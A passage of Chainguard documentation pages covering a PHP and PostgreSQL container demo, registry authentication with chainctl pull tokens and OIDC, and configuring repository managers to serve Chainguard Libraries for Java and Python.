PHP application that uses a Postgres database. This guide assumes you have Docker installed to run the demo; specifically, the procedure outlined in this guide uses Docker Compose to manage the environment on your local machine. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Step 1: Setting up a demo application This step involves downloading the demo application code to your local machine. To ensure that the application files don’t remain on your system navigate to a temporary directory like /tmp/. cd /tmp/ Your system will automatically delete the /tmp/ directory’s contents the next time it shuts down or reboots. The code that comprises this demo application is hosted in a public GitHub repository managed by Chainguard. Pull down the example application files from GitHub with the following command. git clone --sparse https://github.com/chainguard-dev/edu-images-demos.git Because this guide’s demo application code is stored in a repository with other examples, we don’t need to pull down every file from this repository. For this reason, this command includes the --sparse option. This will initialize a sparse-checkout file; this causes the working directory to contain only the files in the root of the repository until the sparse-checkout configuration is modified. Navigate into this new directory. cd edu-images-demos To retrieve the files you need for this tutorial’s sample application, run the following git command. git sparse-checkout set postgres This modifies the sparse-checkout configuration initialized in the previous git clone command so that the checkout only consists of the repo’s postgres directory. Navigate into this new directory. cd postgres/ From here, you can run the application and use a web browser to observe it working in real time, which we’ll do in the next section. Step 2: Inspect, run, and test the sample application We encourage you to check out the application code on GitHub to better understand how this application works, but we’ll provide a brief overview here. This demo creates a LEPP (Linux, (E)NGINX, PostgreSQL and PHP-FPM) environment based on Wolfi Chainguard Containers. We will use Docker Compose to bring up the environment, which will spin up three containers: an app container, a postgres container, and an nginx container. These will run as services. Once the environment is up, you can visit the demo in your web browser. The index.php file contains code that does the following: Connects to the PostgreSQL server running in the postgres container Creates a new table named data if it doesn’t already exist Inserts a new entry into the table with a random number Queries the table to show all the entries Every time you reload the page, a new entry will be added to the table. Note that this application includes a Dockerfile. cat Dockerfile FROM cgr.dev/chainguard/php:latest-fpm-dev USER root RUN apk update && apk add php-pgsql USER php This Dockerfile takes the public php:latest-fpm-dev Chainguard Container and installs the php-pgsql package onto it. This container image comes with drivers that allow PHP applications to connect to MySQL or MariaDB databases by default but it doesn’t have an equivalent for PostgreSQL. For this reason, we use this Dockerfile to install this package in order for the PHP application to be able to connect to the Postgres database. Execute the following command to build a container with this Dockerfile, and then create and start each of the three containers and bring up the application. docker compose up -d The -d option is short for --detach; this will cause the containers to run in the background, allowing you to continue using the same terminal window. If you run into permissions issues when running this command, try running it again with sudo privileges. Note: If at any point you’d like to stop and remove these containers, run docker compose down. Once all the containers have started, you’ll be able to visit the application and observe it working. Open up your preferred web browser and navigate to localhost:8000. There, you’ll be presented with text like the following Every time you refresh your browser, a new entry will appear. This shows that the application is recording each visit in the PostgreSQL database and that the application is working correctly. After confirming that the application is functioning as expected, you can read through the next section to explore how else you can work with the postgres container. Step 3: Working with the database The docker-compose.yml file contains some configuration details regarding the PostgreSQL database used in this example application. Run the following command to inspect the contents of this file. cat docker-compose.yml We’re interested in the postgres service: . . . postgres: image: cgr.dev/chainguard/postgres restart: unless-stopped environment: POSTGRES_USER: php POSTGRES_PASSWORD: password POSTGRES_DB: php-test ports: - 5432:5432 networks: - wolfi . . . This section defines a few environment variables relating to the database used in the example application. Importantly, they specify that the application database is named php-test and runs under a user named php with the password “password”. Using this information, you can connect to the php-test database running in the container with a command like the following. docker exec -it postgres-postgres-1 \ psql -p 5432 -U php -W -d php-test docker exec allows you to execute commands within a running container. The -i argument allows you to execute an interactive command while the -t option allocates a pseudo-TTY to the process within the container. Because our goal is to access the sample database through the psql command line client, these options are necessary. Next, enter the name of the container running the PostgreSQL database; by default, this will be named postgres-postgres-1. Following that, the remainder of this command represents the command that will be run within the container. Here, we run the psql command to access the database specifying that we want to connect over port 5432 as the php user. The -W option indicates that we want to be prompted to enter the password interactively, and -d php-test specifies that we want to connect to the php-test database. Password: Enter password and you’ll then be presented with the psql command prompt. psql (15.3) Type "help" for help. php-test=# From here, you can interact with the database from within the postgres-postgres-1 container as you would with any other PostgreSQL database. For example, you could update existing tables, create new ones, and insert or delete data. To close the psql prompt, you can enter the following command. \q Of course, you likely won’t be regularly managing your containerized databases over the command line. The purpose of this section is to only show that you can interact with the database running in this container just like you would with any other Postgres database. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose PostgreSQL Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. Configuring the PostgreSQL container image You can extend Chainguard’s PostgreSQL container image with environment variables. Chainguard’s PostgreSQL container image is compatible with the environment variables available in the official PostgreSQL image, including the following: PGDATA: This variable allows you to define another location for database files. The default data directory is /var/lib/postgresql/data. POSTGRES_PASSWORD: This environment variable sets the superuser password for PostgreSQL. This variable is required to use the PostgreSQL image. POSTGRES_USER: This is used with the POSTGRES_PASSWORD variable to set a superuser for the database and its password. If not specified, you can use the default postgres user. POSTGRES_DB: Using this variable allows you to set a different name for the default database. If not specified, the default database will be postgres or the value set by POSTGRES_USER. POSTGRES_INITDB_ARGS: This variable allows you to send arguments to postgres initdb. POSTGRES_INITDB_WALDIR: You can set this variable to define the location for the PostgreSQL transaction log. By default, the transaction log is stored in a subdirectory of the main PostgresSQL data folder, which you can define with PGDATA. POSTGRES_HOST_AUTH_METHOD: This variable allows you to control the auth-method used to authenticate when connecting to the database. Note that if you set the POSTGRES_HOST_AUTH_METHOD variable to trust, then the POSTGRES_PASSWORD variable is no longer required: docker run --rm -e POSTGRES_HOST_AUTH_METHOD=trust -e POSTGRES_DB=linky -ti --name postgres-test cgr.dev/ORGANIZATION/postgres:latest Be aware that the Docker specific variables will only have an effect if you start the container with an empty data directory; pre-existing databases won’t be affected on container startup. You can also run the Chainguard PostgreSQL container image with a custom configuration file. The following example will mount a PostgreSQL configuration file named my-postgres.conf to the container. docker run --rm -v "$PWD/my-postgres.conf":/etc/postgresql/postgresql.conf -e POSTGRES_PASSWORD=password -ti --name postgres-test cgr.dev/ORGANIZATION/postgres:latest -c 'config_file=/etc/postgresql/postgresql.conf' This command also uses the postgres server’s -c flag to set the config_file runtime parameter. --- ### Authenticate to Chainguard's Registry URL: https://edu.chainguard.dev/chainguard/chainguard-registry/authenticating/ Last Modified: April 11, 2025 Tags: Chainguard Containers, Product, Registry Public Container Images Chainguard offers a collection of images that are publicly available, don’t require authentication, and are free to use by anyone. However, logging in with a Chainguard account and authenticating when pulling from the registry gives you access to the Chainguard Console, and provides a mechanism for Chainguard to contact you if there are any issues with images you are pulling. This may enable Chainguard to notify you of upcoming deprecations, changes in behavior, critical vulnerabilities and remediations for images you have recently pulled. Signing Up You can register a Chainguard account through our sign up form. This will create your account and a Chainguard IAM organization. If you already have an account, you can log in through the login page. For more details on signing in, you can review our sign in guidance. If your organization is interested in (or already using) custom identity providers like Okta, you can read how to authenticate to Chainguard with custom identity providers. Authenticating with the chainctl Credential Helper You can configure authentication by using the credential helper included with chainctl. This is the workflow recommended by Chainguard. First install chainctl and configure the credential helper: chainctl auth configure-docker This will update your Docker config file to call chainctl when an auth token is needed. A browser window will open when the token needs to be refreshed. Pulls authenticated in this way are associated with your user. Authenticating with a Pull Token You can also create a “pull token” using chainctl. This generates a longer-lived token that can be used to pull images from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Artifactory. First install chainctl, then log in and configure a pull token: chainctl auth configure-docker --pull-token With the latest release of chainctl, this will print a docker login command that can be run in the CI environment to log in with a pull token. You can also pass the --save flag, which will update your Docker config file with the pull token directly. This token expires in 30 days by default, which can be shortened using the --ttl flag (for example, --ttl=24h). Pulls authenticated in this way are associated with a Chainguard identity, which is associated with the organization selected when the pull token was created. Note on Multiple Pull Tokens Running the chainctl auth configure-docker --pull-token command multiple times will result in multiple pull tokens being created. However, the tokens stored in your Docker config when using --save will overwrite old tokens. Tokens cannot be retrieved once they have been overwritten so they must be extracted from the local Docker config and saved elsewhere if multiple are required. Revoking a Pull Token Pull tokens are associated with Chainguard identities so they can be viewed with: chainctl iam identities list To revoke a token, delete the associated identity. chainctl iam identity delete <identity UUID> Managing Pull Tokens in the Chainguard Console You can also create and view pull tokens in the Chainguard Console. After navigating to the Console, click on Settings in the left-hand navigation menu. From the Settings pane, click on Pull tokens. There, you’ll be presented with a table listing of all the active pull tokens for your selected organization. This table shows the name of each pull token, their descriptions, the date they were created, and the number of days until they expire. You can create a new pull token by clicking the Create pull token button at the top of the page. A new pane will appear where you can enter a name for the new pull token, add an optional description, and select when the pull token will expire. The Expiration drop-down menu has options for 30, 60, and 90 days, as well as a Custom expiration option. This will cause a Custom Expiration window to appear, allowing you to select the date when you’d like the token to expire. After entering these details, click the Create token button and your new pull token will appear in the list with the rest of your organization’s tokens. Authenticating with GitHub Actions You can configure authentication with OIDC-aware CI platforms like GitHub Actions. First create an identity using chainctl, which can be limited to only allow OIDC federation from certain GitHub workflow runs: chainctl iam identity create github [GITHUB-IDENTITY] \ --github-repo=${GITHUB_ORG}/${GITHUB_REPO} \ --github-ref=refs/heads/main \ --role=registry.pull Note: The value passed to --github-repo should be equal to the repository name you expect to be returned in the subject field of the token from GitHub. If you need to further scope or change the subject you can find a number of useful examples in the “Example subject claims” section of GitHub’s OIDC documentation and then you may update the identity with chainctl iam identities update. This creates a Chainguard identity that can be assumed by a GitHub Actions workflow only for the specified GitHub repository, triggered on pushes to the specified branch (such as refs/heads/main), with permissions only to pull from Chainguard’s registry. When this identity is created, its ID will be displayed. Using this ID, you can configure your GitHub Actions workflow to install chainctl and assume this identity when the workflow runs: name:Registry Exampleon:push:branches:['main']permissions:contents:readid-token:write # This is needed for OIDC federation.jobs:example:runs-on:ubuntu-lateststeps:- uses:chainguard-dev/setup-chainctl@mainwith:identity:[[The Chainguard Identity ID you created above ]]- run:docker pull cgr.dev/chainguard/nodePulls authenticated in this way are associated with the Chainguard identity you created, which is associated with the organization selected when the identity was created. If the identity is configured to only work with GitHub Actions workflow runs from a given repo and branch, that identity will not be able to pull from other repos or branches, including pull requests targeting the specified branch. Authenticating with Kubernetes You can also configure a Kubernetes cluster to use a pull token, as described above. When you create a pull token with --save, your Docker config file is updated to include that token and configure it to be used when pulling images from cgr.dev. After that, you can create a Kubernetes secret based on those credentials, following these instructions: kubectl create secret generic regcred \ --from-file=.dockerconfigjson=<path/to/.docker/config.json> \ --type=kubernetes.io/dockerconfigjson Important Note: this will also make any other credentials you have configured in your Docker config available in the secret. Ensure only the necessary credentials are included. Then you can create a Pod that uses that secret, following these instructions: apiVersion:v1kind:Podmetadata:name:cgr-examplespec:containers:- name:nginximage:cgr.dev/chainguard/nginx:latestimagePullSecrets:- name:regcredFor this example, save the file as cgr-example.yaml. Then you can create and get the Pod: kubectl apply -f cgr-example.yaml kubectl get pod cgr-example Learn more in our sign in guidance. --- ### Chainguard Libraries for Java Overview URL: https://edu.chainguard.dev/chainguard/libraries/java/overview/ Last Modified: March 31, 2025 Tags: Chainguard Libraries, Java, Overview Introduction Chainguard Libraries for Java represents the first ecosystem support with Chainguard Libraries. The Java and larger JVM ecosystem consists of hundreds of open source projects from large foundations such as the Apache Software Foundation, the Eclipse Foundation, and many smaller foundations and projects. Chainguard Libraries for Java provides access to all open source libraries commonly used. New releases of common libraries or artifacts requested by customers are added to the growing index by an automated system. The number of included libraries continues to grow. The main public repository for binary artifacts is the Maven Central Repository. It has been in operation for nearly 20 years and hosts artifacts of all releases of most open source projects in the Java community. It is the default repository in all commonly used build tools from the Java community including Apache Maven, Gradle, and others and uses the Maven repository format. Chainguard Libraries for Java covers all open source artifacts from Maven Central. Chainguard Libraries for Java also builds binaries for many other open source projects available in other repositories or on code hosting platforms like GitHub. Examples include Google, Oracle, JetBrains, CERN, Apache, and many others. Any request for a library or library version missing in Chainguard Libraries automatically triggers a process to provision the artifacts from relevant sources if available. You can use Chainguard Libraries for Java alongside third-party software repositories to create a single source of truth with your repository manager application. Runtime requirements The runtime requirements for Java artifacts available from Chainguard Libraries for Java are identical to the requirements of the original upstream project. For example, if a JAR retrieved from Maven Central requires Java 17 or higher, the same Java 17 runtime requirement applies to the binary artifact from Chainguard Libraries for Java. Technical details The username and password retrieved with chainctl are required to access the Chainguard Libraries for Java repository. The URL for the repository is: https://libraries.cgr.dev/java/ This Chainguard Libraries for Java repository uses the Maven repository format and only includes release artifacts of the libraries built by Chainguard from source. Snapshot versions are not available. The URL does not expose a browsable directory structure. However, if you know the location of any particular artifact you can use the login credentials and a set path URL to access a file. The Chainguard Libraries for Java repository does not include all artifacts from the Maven Central Repository and other repositories. Specifically, the following components can be required by your application builds, yet are not included: Binary versions of closed-source libraries. The Maven Central Repository and other repositories often include such libraries. They enable interoperability with open source applications and development of internal applications as a combination of these libraries and other open source libraries. Examples include JDBC drivers for proprietary databases such as Oracle Other artifacts that are found in the Maven Central Repository with incomplete information about the location of the source code or a pointer to a location with access restrictions or an incomplete source, that prevents creation of a binary by Chainguard. Some types of artifacts are included if the source build produces them, but are often not available: Source JAR artifacts Javadocs JAR artifacts Distributable versions of artifacts such JARs with dependencies or tar.gz archives Other package formats sometimes found such as RPMs, SO files, Android AARs, and similar rarely used artifacts As a result, you must configure the repository as the first point of contact and request for any retrieval of a library. This ensures that any library that is available from Chainguard is also used. In addition, any failed requests are flagged at Chainguard and backfill processes are run where possible. At the same time, you must continue to use the Maven Central Repository, and any other repository that fills the needs for libraries that are not available from the Chainguard Libraries repository. Typically the access is configured globally on a repository manager for your organization. This approach is strongly recommended. Alternatively, you can use the token for direct access from a build tool as discussed in Build configuration. Manual testing You can manually download specific artifacts from the repository if you know the URL as determined by the identifying GAV coordinates for an artifact. For example, you can locate a Maven POM file on the Maven Central Repository: https://repo1.maven.org/maven2/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom And then use the path composed from the Maven coordinates commons-io/commons-io/2.17.0/commons-io-2.17.0.pom And combine it with the URL for the Chainguard Libraries for Java repository to check for the presence of the same file: https://libraries.cgr.dev/java/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom Use the Maven Central Repository search or browse functionality to locate artifacts of interest. If you use the URL directly in a browser, you have to provide the username and password to log in to the Chainguard repository to download the file. Use curl, specify the username and password retrieved with chainctl for basic user authentication and use the URL of the file to download and save the file with the original name. With .netrc authentication: curl -n -L --user "$CHAINGUARD_JAVA_IDENTITY_ID:$CHAINGUARD_JAVA_TOKEN" \ -O https://libraries.cgr.dev/java/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom With environment variables: curl -L --user "$CHAINGUARD_JAVA_IDENTITY_ID:$CHAINGUARD_JAVA_TOKEN" \ -O https://libraries.cgr.dev/java/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom The option -L is required to follow redirects for the actual file locations. Use checksums of any file to verify if it originates from the Chainguard repository. --- ### Global Configuration URL: https://edu.chainguard.dev/chainguard/libraries/java/global-configuration/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Java Java and JVM library consumption in a large organization is typically managed by a repository manager. Commonly used repository manager applications are Cloudsmith, Google Artifact Registry, JFrog Artifactory, and Sonatype Nexus Repository. The repository manager acts as a single point of access for developers and development tools to retrieve the required libraries. At a high level, adopting the use of Chainguard Libraries consists of the following steps: Add Chainguard Libraries as a remote repository for library retrieval. Configure the Chainguard Libraries repository as the first choice for any library access. This ensures that any future requests of new libraries access the version supplied by Chainguard. Typically this is accomplished by creating a group repository or virtual repository that combines the repository with other external and internal repositories. Additional steps depend on the desired insights and can include the following optional measures: Remove all cached artifacts in the proxy repository of Maven Central and other repositories. This step allows you to validate which libraries are not available from Chainguard Libraries and proceed with potential next steps with Chainguard and your own development efforts. Remove any repositories that are no longer desired or necessary. Depending on your library requirements this step can result in removal of some proxy repositories or even removal of all proxy repositories. Adopting the use of a repository manager is the recommended approach, however if your organization does not use a repository manager, you can still use Chainguard Libraries. All access to the Chainguard libraries repository is then distributed across all your build platforms and therefore more complex to configure and control. Cloudsmith Cloudsmith supports Maven repositories for proxying and hosting. Refer to the Maven Repository documentation and the Maven Upstream documentation for Cloudsmith for more information. Cloudsmith supports combining repositories by defining multiple upstream repositories. Initial configuration Use the following steps to add a repository with the Maven Central Repository and the Chainguard Libraries for Java repository as Maven upstream repositories. Configure a java-all repository: Log in as a user with administrator privileges. Select the Repositories tab near the top of the screen. On the Repositories page, click the + New repository button. Enter the name java-all for your new repository. The name should include java to identify the ecosystem. This convention helps avoid confusion since repositories in Cloudsmith are multi-format. Select a storage region that is appropriate for your organization and infrastructure. Press + Create Repository. Configure an upstream proxy for the Maven Central Repository: Click the name of the new java-public repository on the repositories page to configure it. Access the Upstreams tab and click + Add Upstream Proxy. Configure an upstream proxy with the format Maven and the following details: Configure another upstream proxy with the following details Name java-public Priority 2 Upstream URL https://repo1.maven.org/maven2/ Mode Cache and Proxy Press Create Upstream Proxy. Configure an upstream proxy for the Chainguard Libraries for Java repository: Click the name of the new java-chainguard repository on the repositories page to configure it. Access the Upstreams tab and click + Add Upstream Proxy. Configure an upstream proxy with the format Maven and the following details: Name java-chainguard Priority 1 Proxy URL https://libraries.cgr.dev/java/ Mode Cache and Proxy Add the Username and Password value from Chainguard Libraries access in Authentication Settings Press Create Upstream Proxy. Use this setup for initial testing with Chainguard Libraries for Java. For production usage, add the java-chainguard upstream proxy to your production repository. Build tool access The following steps allow you to determine the URL and authentication details for accessing the repository: Select the Packages tab. Press Push/Pull Packages. Choose the format Maven. Copy the value in the <url> tag from the XML snippet with the <repositories> entry. For example, https://dl.cloudsmith.io/basic/exampleorg/java-all/maven/ with exampleorg replaced with the name of your organization. Note that the name of the repository java-all as well as maven as identifier for the format are part of the URL. Copy the username and password values block from the second code snippet for authentication after choosing the desired authentication of Default or API Key. Choose a different format and the equivalent sections if you are using another build tools such as Gradle. Use the URL of the repository, the username, and the password for the server authentication block in the build configuration. and build a firs test project. In a working setup all libraries retrieved from Chainguard are tagged with the name of the upstream proxy. Google Artifact Registry Google Artifact Registry supports the Maven format for hosting artifacts in Standard repositories and proxying artifacts from public repositories in Remote repositories. Use Virtual repositories to combine them for consumption with Maven and other build tools. Use the Java package documentation for Google Artifact Registry as the starting point for more details. Initial configuration Use the following steps to add the Maven Central Repository and the Chainguard Libraries for Java repository as remote repositories and combine them as a virtual repository: Log in to the Google Cloud console as a user with administrator privileges. Navigate to your project and find the Artifact Registry with the search. Activate Artifact Registry if necessary. Navigate to your project and find the Secret Manager with the search. Activate Secret Manager if necessary. Before configuring the repositories, you must create a secret with the password value as retrieved with chainctl: Navigate to the Secret Manager Press Create secret. Set the Name to chainguard-libraries-java. Use the Password from chainctl output to set the Secret value. Press Create secret. Navigate to Artifact Registry and select Repositories in the left hand navigation under the Artifact Registry label to configure a remote repository for the Maven Central Repository: Press Create a Repository or the + button. Set the Name to java-public. Set the Format to Maven. Select Remote for the Mode. Select Maven Central for the Remote repository source. Choose a suitable Region for your development in Location type. Press Create. Configure a remote repository for the Chainguard Libraries for Java repository: Press the + button to add another repository. Set the Name to java-chainguard. Set the Format to Maven. Select Remote for the Mode. Select Custom for the Remote repository source. Set the URL for the Custom repository to https://libraries.cgr.dev/java/. Select Authenticated in Remote repository authentication mode. Set Username for the upstream repository to the value as retrieved with chainctl. Select the chainguard-libraries-java secret in the list for the Secret input. Choose the same suitable Region for your development in Location type as configured for the java-public repository. Press Create. Combine the two repositories in a new virtual repository: Press the + button to add another repository. Set the Name to java-all. Set the Format to Maven. Select Virtual for the Mode. Press Add upstream repository in Virtual upstream repositories. Use the Browse button to locate and select the java-chainguard repository as Repository 1 and set the Policy name 1 to java-chainguard. Use the Browse button to locate and select the java-public repository as Repository 1 and set the Policy name 1 to java-public. Press Add upstream repository in Virtual upstream repositories. Set the Priority value for the java-chainguard policy name to a higher value than the java-public priority value. Choose the same suitable Region for your development in Location type as configured for the java-public repository. Press Create. Build tool access The following steps allow you to configure your build tool for accessing the repository: Navigate to Artifact Registry and select Repositories in the left hand navigation under the Artifact Registry label. Click on the java-all repository name in the list of repositories. Press the Setup instructions button and follow the documentation. Note that you must add the extension com.google.cloud.artifactregistry:artifactregistry-maven-wagon to each project. In a working setup, the chainguard remote repository contains all artifacts retrieved from Chainguard. JFrog Artifactory JFrog Artifactory supports Maven repositories for proxying and hosting, and virtual repositories to combine them. Refer to the Maven Repository documentation for Artifactory for more information. Initial configuration Use the following steps to add the Maven Central Repository and the Chainguard Libraries for Java repository as remote repositories and combine them as a virtual repository: Log in as a user with administrator privileges. Press Administration in the top navigation bar. Select Repositories in the left hand navigation. Configure a remote repository for the Maven Central Repository: Press Create a Repository and choose the Remote option. Select Maven as the Package type. Set the Repository Key to java-public. Set the URL to https://repo1.maven.org/maven2/ . Deactivate Maven Settings - Handle Snapshots. Press Create Remote Repository. Configure a remote repository for the Chainguard Libraries for Java repository: Press Create a Repository and choose the Remote option. Select Maven as the Package type. Set the Repository Key to java-chainguard. Set the URL to https://libraries.cgr.dev/java/. Set User Name and Password / Access Token to the values as retrieved with chainctl. Check the Enable Token Authentication checkbox. Press Test to validate the connection. Deactivate Maven Settings - Handle Snapshots. Access the Advanced configuration tab and deactivate the Block Mismatching Mime Types setting in the Others section. Press Create Remote Repository. Combine the two repositories in a new virtual repository: Press Create a Repository and choose the Virtual option. Set the Repository Key to java-all. Scroll down to the Repositories section Add the java-chainguard and java-public repositories. Ensure the java-chainguard repository is the first in the displayed list. Use the icon on the right of the repository name to drag and drop repositories into the desired position. Press Create Virtual Repository. Use this setup for initial testing with Chainguard Libraries for Java. For production usage add the java-chainguard repository to your production virtual repository. Build tool access The following steps allow you to determine the URL and authentication details for accessing the repository: Press Administration in the top navigation bar. Select Repositories in the left hand navigation. Select the Virtual tab in the repositories view. Locate the chainguard-maven* repository. Hover over the row and click the … in the last column on the right. Select Set Me Up in the dialog. Press Generate Token & Create Instructions Copy the generated token value to use as the password for authentication. Press Generate Settings. Copy the value from a url field. The are all identical. For example, https://exampleorg.jfrog.io/artifactory/java-all/ with exampleorg replaced with the name of your organization. Use the URL of the virtual repository in the build configuration and build a first test project. In a working setup the chainguard remote repository contains all libraries retrieved from Chainguard. Sonatype Nexus Repository Sonatype Nexus Repository includes a maven-public repository group out of the box. It groups access to the Maven Central Repository from the maven-central repository with the internal maven-releases and maven-snapshot repositories. Refer to the Maven Repositories documentation for Nexus for more information. If you are using this group, you can add a proxy repository for Chainguard Libraries for Java repository for production use. Initial configuration For initial testing and adoption it is advised to create a separate proxy repository for the Maven Central Repository, a separate proxy repository Chainguard Libraries for Java repository, and a separate repository group: Log in as a user with administrator privileges. Access the Server administration and configuration section with the gear icon in the top navigation bar. Configure a remote repository for the Maven Central Repository: Select Repository - Repositories in the left hand navigation. Press Create repository. Select the maven2 (proxy) recipe. Provide a new name java-public. Ensure Maven 2 - Version policy is set to Release. In the Proxy - Remote storage input add the URL https://repo1.maven.org/maven2/. Press Create repository. Configure a remote repository for the Chainguard Libraries for Java repository: Select Repository - Repositories in the left hand navigation. Press Create repository. Select the maven2 (proxy) recipe. Provide a new name java-chainguard. Ensure Maven 2 - Version policy is set to Release. In the Proxy - Remote storage input add the URL https://libraries.cgr.dev/java/. In HTTP - Authentication with the Authentication type username, provide the username and password values as retrieved with chainctl. Press Create repository. Combine a new repository group and add the two repositories: Select Repository - Repositories in the left hand navigation. Press Create repository. Select the maven2 (group) recipe. Provide a new name java-all. In the section Group - Member repositories, move the new repositories java-public and java-chainguard to the right and move the java-chainguard repository to the top of the list with the arrow control. Build tool access The following steps allow you to determine the URL and authentication details for accessing the repository: Click Browse in the Welcome view or the browse icon (cube) in the top navigation bar. Locate the URL column for the java-all repository group and press copy. For example, https://repo.example.com/repository/java-all/ with repo.example.com replaced with the hostname of you repository manager. Copy the URL in the dialog. Use your configured username and password unless Security - Anonymous Access - Access - Allow anonymous users to access the server is activated. Details vary based on your configured authentication system. Use the URL of the repository group, such as https://repo.example.com/repository/java-all/ or https://repo.example.com/repository/maven-public/ in the build configuration and build a first test project. In a working setup the java-chainguard proxy repository contains all libraries retrieved from Chainguard. --- ### Global Configuration URL: https://edu.chainguard.dev/chainguard/libraries/python/global-configuration/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Python Python library consumption in a large organization is typically managed by a repository manager. Commonly used repository manager applications are Cloudsmith, JFrog Artifactory, and Sonatype Nexus Repository. The repository manager acts as a single point of access for developers and development tools to retrieve the required libraries. At a high level, adopting the use of Chainguard Libraries consists of the following steps: Add Chainguard Libraries as a remote repository for library retrieval. Add the public PyPI repository as a remote repository. Create a group, virtual, or polyglot repository combining these repository sources with any desired internal repositories. Configure the Chainguard Libraries repository as the first choice for any library access after any desired internal repositories. You should also: Remove all prior cached artifacts in the virtual server or proxy public repository. This step reduces confusion about the origin of libraries and assists technical evaluation and adoption of Chainguard Libraries. Remove any repositories that are no longer desired or necessary. Depending on your library requirements, this step can result in removal of some proxy repositories or even removal of all proxy repositories. If your organization does not use a repository manager, you can still use Chainguard Libraries. However, this approach requires configuration of multiple build and development platforms and utilities to use Chainguard Libraries. For this reason, adopting the use of a repository manager is the recommended approach. Cloudsmith Cloudsmith supports Python repositories for proxying and hosting and polyglot repositories that combine multiple repositories sources with compatible formats. Refer to the Cloudsmith Python Repository documentation and the Cloudsmith documentation for creating a repository for more information. Initial configuration Use the following steps to add a repository with both Chainguard Libraries for Python and PyPI as upstream sources. First, create a repository: Log in to your Cloudsmith instance as user with administrator privileges. Select the Repositories tab near the top of the screen. Navigate to the Repositories Overview, then select + New repository. At the new repository form, enter the name python-all for your new repository. The name should include python to identify the repository format. This convention helps avoid confusion, since repositories in Cloudsmith are multi-format. Select a storage region that is appropriate for your organization and infrastructure. Select + Create Repository. Next, configure the upstream proxies: Select the name of the new python-all repository on the repositories page to configure it. Access the Upstreams tab and click + Add Upstream Proxy. Configure an upstream proxy with the format python and the following details: Name: python-chainguard Priority: 1 Upstream URL: https://libraries.cgr.dev/python/ Mode: Cache and Proxy Select Create Upstream Proxy. Configure another upstream proxy with the following details Name: python-public Priority: 2 Upstream URL: https://pypi.org/ Mode: Cache and Proxy Select Create Upstream Proxy. Build tool access See the page on build tool configuration for Chainguard Libraries for Python for information on accessing credentials and setting up build tools. JFrog Artifactory JFrog Artifactory supports PyPI repositories for proxying and virtual repositories to combine multiple sources into a single repository. The following instructions are based on the PyPI Repository documentation for Artifactory. Initial configuration Use the following steps to add the Chainguard Libraries for Python index and the PyPI public index as remote repositories and combine them as a virtual repository: Log in as a user with administrator privileges. Press Administration in the top navigation bar. Select Repositories in the left hand navigation. Configure a remote repository for the Chainguard Libraries for Python index: Select Create a Repository and choose the Remote option. Select PyPI as the Package type. Set the Repository Key to python-chainguard. Set the URL to https://libraries.cgr.dev/python/. Set User Name and Password / Access Token to the values as retrieved with chainctl. Check the Enable Token Authentication checkbox. Set the Pypi Settings - Registry URL to https://libraries.cgr.dev/python/. Access the Advanced configuration tab and deactivate the Block Mismatching Mime Types setting in the Others section. Press Create Remote Repository. Configure a remote repository for the PyPI public index: Select Create a Repository and choose the Remote option. Select PyPI as the Package type. Set the Repository Key to python-public. Set the URL to https://files.pythonhosted.org. Set the Pypi Settings - Registry URL to https://pypi.org/. Select Create Remote Repository. Combine the two repositories in a new virtual repository: Press Create a Repository and choose the Virtual option. Select PyPI as the Package type. Set the Repository Key to python-all. In the Repositories section, find the python-chainguard and python-public repositories. Ensure the python-chainguard repository is the first in the displayed list. Use the icon on the right of the repository name to drag and drop repositories into the desired position. Select Create Virtual Repository. At this point, you have a virtual repository set up in Artifactory that allows you or others in your organization to access Chainguard Libraries for Python with your chosen tools. This setup falls back to the public PyPI index in cases where a package is not available in Chainguard’s index. Build tool access See the page on build tool configuration for Chainguard Libraries for Python for information on accessing credentials and setting up build tools. Sonatype Nexus Repository Sonatype Nexus Repository allows for merging multiple remote repositories as a repository group. The below instructions for are based on the Nexus documentation for PyPI Initial configuration The following steps create remote repositories for Chainguard Libraries for Python, a remote repository for the public PyPI index, and a repository group combining these sources. First, log in to Sonatype Nexus as a user with administrator privileges and access the Server administration and configuration section within the gear icon in the top navigation bar. Next, configure a remote repository for the public PyPI index: Select Repository - Repositories in the left hand navigation. Select Create repository. Select the PyPI (proxy) recipe. Provide a new name, such as python-public. In the Proxy - Remote storage field, add the following URL: https://pypi.org/. Select Create repository. Configure a remote repository for the Chainguard Libraries for Python repository: Select Repository - Repositories in the left hand navigation. Select Create repository. Select the PyPI (proxy) recipe. Provide a new name, such as python-chainguard. In the Proxy - Remote storagefield, add the following URL: https://libraries.cgr.dev/python/. In HTTP - Authentication, set the Authentication type to username and enter the the username and password values as retrieved with chainctl. Select Create repository. Finally, create a new repository group and add the two repositories: Select Repository - Repositories in the left hand navigation. Select Create repository. Select the PyPI (group) recipe. Provide a new name, such as python-all. In the section Group - Member repositories, move the new repositories python-public and python-chainguard to the right and move the python-chainguard repository to the top of the list with the arrow control. Build tool access See the page on build tool configuration for Chainguard Libraries for Python for information on accessing credentials and setting up build tools. --- ### Build Configuration URL: https://edu.chainguard.dev/chainguard/libraries/java/build-configuration/ Last Modified: April 21, 2025 Tags: Chainguard Libraries, Java The configuration for the use of Chainguard Libraries depends on your build tools, continuous integration, and continuous deployment setups At a high level adopting the use of Chainguard Libraries consists of the following steps: Remove local caches on workstations and CI/CD pipelines. This step ensures that any libraries that were already sourced from other 